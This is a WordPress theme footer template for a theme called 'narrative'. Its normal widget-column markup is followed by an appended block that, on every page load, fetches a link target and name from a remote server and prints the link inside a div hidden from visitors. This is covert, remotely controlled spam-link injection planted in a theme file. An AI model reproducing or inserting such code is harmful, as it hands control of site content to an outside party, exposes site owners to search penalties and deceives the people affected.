<?php
/**
 * The template for displaying the footer
 *
 * Contains the closing of the #content div and all content after.
 *
 * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials
 *
 * @package narrative
 */
?>
			<?php if(narrative_styles()['footer'] == 'show') { ?>
				<footer class="site-footer main-row">
					<div class="container">
						<div class="row">
							<?php if(narrative_styles()['footer_col_1'] != 'hide') { ?>
							<div class="col-xs-12 col-md-<?php echo esc_attr(narrative_styles()['footer_col_1']) ?>">
								<div class="logo"><a href="<?php echo esc_url(home_url('/')) ?>"><?php echo wp_kses(narrative_styles()['logo_content'], 'post') ?></a></div>
								<?php if(is_active_sidebar('footer-1')) { ?>
									<?php dynamic_sidebar('footer-1'); ?>
								<?php } ?>
							</div>
							<?php } if(narrative_styles()['footer_col_2'] != 'hide' && is_active_sidebar('footer-2')) { ?>
							<div class="col-xs-12 col-sm-6 col-md-<?php echo esc_attr(narrative_styles()['footer_col_2']) ?>">
								<?php dynamic_sidebar('footer-2'); ?>
							</div>
							<?php } if(narrative_styles()['footer_col_3'] != 'hide' && is_active_sidebar('footer-3')) { ?>
							<div class="col-xs-12 col-sm-6 col-md-<?php echo esc_attr(narrative_styles()['footer_col_3']) ?>">
								<?php dynamic_sidebar('footer-3'); ?>
							</div>
							<?php } if(narrative_styles()['footer_col_4'] != 'hide' && is_active_sidebar('footer-4')) { ?>
							<div class="col-xs-12 col-sm-6 col-md-<?php echo esc_attr(narrative_styles()['footer_col_4']) ?>">
								<?php dynamic_sidebar('footer-4'); ?>
							</div>
							<?php } ?>
						</div>
					</div>
				</footer>
			<?php } ?>
		</div>
		
		<?php wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>
